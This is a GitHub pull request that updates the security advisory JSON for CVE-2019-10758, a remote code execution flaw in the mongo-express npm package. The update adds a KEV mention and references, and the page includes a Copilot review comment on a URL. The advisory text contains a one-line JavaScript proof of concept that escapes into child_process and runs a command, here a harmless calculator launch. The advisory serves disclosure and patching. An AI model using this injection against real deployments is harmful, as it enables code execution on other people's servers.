Skip to content

[GHSA-h47j-hc6x-h3qq] Remote Code Execution Vulnerability in NPM mongo-express #5855

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
@@ -1,13 +1,13 @@
{
"schema_version": "1.4.0",
"id": "GHSA-h47j-hc6x-h3qq",
"modified": "2025-02-07T18:01:54Z",
"modified": "2025-02-07T18:01:55Z",
"published": "2019-12-30T19:30:31Z",
"aliases": [
"CVE-2019-10758"
],
"summary": "Remote Code Execution Vulnerability in NPM mongo-express",
"details": "### Impact\n\nRemote code execution on the host machine by any authenticated user.\n\n### Proof Of Concept\n\nLaunching mongo-express on a Mac, pasting the following into the \"create index\" field will pop open the Mac calculator:\n\n```javascript\nthis.constructor.constructor(\"return process\")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')\n```\n\n### Patches\nUsers should upgrade to version `0.54.0`\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n### References\n[Snyk Security Advisory](https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215)\n[CVE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10758)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [example link to repo](http://example.com)\n* Email us at [example email address](mailto:[email protected])\n\n#### Thanks\n\n@JLLeitschuh for finding and reporting this vulnerability",
"details": "### Impact\n\nRemote code execution on the host machine by any authenticated user.\n\nThis vulnerability is on the CISA Known Exploited Vulnerabilities (KEV) list.\n\n### Proof Of Concept\n\nLaunching mongo-express on a Mac, pasting the following into the \"create index\" field will pop open the Mac calculator:\n\n```javascript\nthis.constructor.constructor(\"return process\")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')\n```\n\n### Patches\nUsers should upgrade to version `0.54.0`\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n### References\n- [Snyk Security Advisory](https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215)\n- [CVE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10758)\n- https://github.com/mongo-express/mongo-express/commit/d8c9bda46a204ecba1d35558452685cd0674e6f2\n\n#### Thanks\n\n@JLLeitschuh for finding and reporting this vulnerability",
"severity": [
{
"type": "CVSS_V3",
Expand Down Expand Up @@ -52,6 +52,14 @@
"type": "WEB",
"url": "https://github.com/mongo-express/mongo-express/commit/7d365141deadbd38fa961cd835ce68eab5731494"
},
{
"type": "WEB",
"url": "https://github.com/mongo-express/mongo-express/commit/d8c9bda46a204ecba1d35558452685cd0674e6f2"
},
{
"type": "PACKAGE",
"url": "https://github.com/mongo-express/mongo-express/blob/ea02b364d43f179f191fc91fb9962efdb0843a8d/lib/bson.js#L60"
Copy link
Preview

Copilot AI Jul 25, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The PACKAGE reference should point to the repository root rather than a specific file and line. Consider using "https://github.com/mongo-express/mongo-express" as the URL for the PACKAGE type reference.

Suggested change
"url": "https://github.com/mongo-express/mongo-express/blob/ea02b364d43f179f191fc91fb9962efdb0843a8d/lib/bson.js#L60"
"url": "https://github.com/mongo-express/mongo-express"

Copilot uses AI. Check for mistakes.

},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215"
Expand Down
Loading